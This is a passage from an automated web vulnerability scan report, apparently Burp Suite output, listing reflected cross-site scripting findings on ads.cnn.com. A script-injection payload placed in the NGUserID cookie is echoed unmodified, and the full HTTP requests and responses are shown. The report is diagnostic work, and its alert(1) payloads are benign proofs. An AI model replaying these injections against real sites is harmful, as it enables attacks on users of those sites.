Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1bdb5d"><script>alert(1)</script>fa90414d27d; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:43 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:43 GMT
Pragma: no-cache
Content-Length: 2853
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3450,4443,37359,47128,47457,52263,52751,52753,52901,56058,56872,57896,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1bdb5d"><script>alert(1)</script>fa90414d27d&amp;random=bwagwuq,bhesAmtdozocI&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1bdb5d"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Efa90414d27d" width="1" height="1" border="0"
...[SNIP]...

1.100. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc8f"><script>alert(1)</script>88b157cc833 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1ffc8f"><script>alert(1)</script>88b157cc833; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 2817
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52751,52753,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1ffc8f"><script>alert(1)</script>88b157cc833%2CTIL%2C1313433990029&amp;random=bauIytu,bhesAkydoyypg&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1ffc8f"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E88b157cc833" width="1"
...[SNIP]...

1.101. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892e4"><script>alert(1)</script>18323b94f54 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1892e4"><script>alert(1)</script>18323b94f54; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:29 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:29 GMT
Pragma: no-cache
Content-Length: 3587
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
67,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,52263,52901,56058,56872,57810,57896,58702,61089,61263,61887,61908,61913,63267,116201,116267,116729&RawValues=NGUSERID%2Caa55a22-30407-167278533-1892e4"><script>alert(1)</script>18323b94f54%2CTIL%2C1313434106153&Redirect=http://www.money.com">
...[SNIP]...

1.102. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab4f2"><script>alert(1)</script>bd293f68bb4 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1ab4f2"><script>alert(1)</script>bd293f68bb4; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:08 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
Pragma: no-cache
Content-Length: 983
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7118,7123,7130,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49570,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1ab4f2"><script>alert(1)</script>bd293f68bb4%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.103. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529f1"><script>alert(1)</script>cdefe8435ae was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1529f1"><script>alert(1)</script>cdefe8435ae; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3501
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
86,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49576,52263,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1529f1"><script>alert(1)</script>cdefe8435ae%2CTIL%2C1313433990029&amp;random=zIdcsd,bhesAkzdoyysv&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1529f1"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Ecdefe8435ae" width="1" h
...[SNIP]...

1.104. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41e40"><script>alert(1)</script>a7702f5becb was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-141e40"><script>alert(1)</script>a7702f5becb; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3735
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
85,686,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49577,52263,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-141e40"><script>alert(1)</script>a7702f5becb%2CTIL%2C1313433990029&Redirect=http://clk.atdmt.com/UNY/go/312249416/direct/01/">
...[SNIP]...

1.105. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59818"><script>alert(1)</script>725de5fe4e2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-159818"><script>alert(1)</script>725de5fe4e2; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:08 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
Pragma: no-cache
Content-Length: 989
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7167,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49578,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-159818"><script>alert(1)</script>725de5fe4e2%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.106. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df8b"><script>alert(1)</script>ef4040623f5 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-16df8b"><script>alert(1)</script>ef4040623f5; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 4324
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
85,686,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49579,52263,52901,56058,56872,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-16df8b"><script>alert(1)</script>ef4040623f5%2CTIL%2C1313433990029&Redirect=http://ads.cnn.com/event.ng/Type=click&FlightID=402671&AdID=550263&TargetID=12855&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7538,8598,10240,12260,17251,
...[SNIP]...

1.107. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 721f7"><script>alert(1)</script>cb37dfb6629 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1721f7"><script>alert(1)</script>cb37dfb6629; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:08 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
Pragma: no-cache
Content-Length: 989
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=1824,2244,2743,3285,6298,6520,6585,7043,7123,7130,7756,8598,10240,12260,17251,18961,19419,22175,25342,253
...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3448,4443,37359,47128,47457,49568,49580,52263,52901,56058,56872,57896,58702,61263,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1721f7"><script>alert(1)</script>cb37dfb6629%2CTIL%2C1313433990029&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.108. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f78e"><script>alert(1)</script>4fc306aade2 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

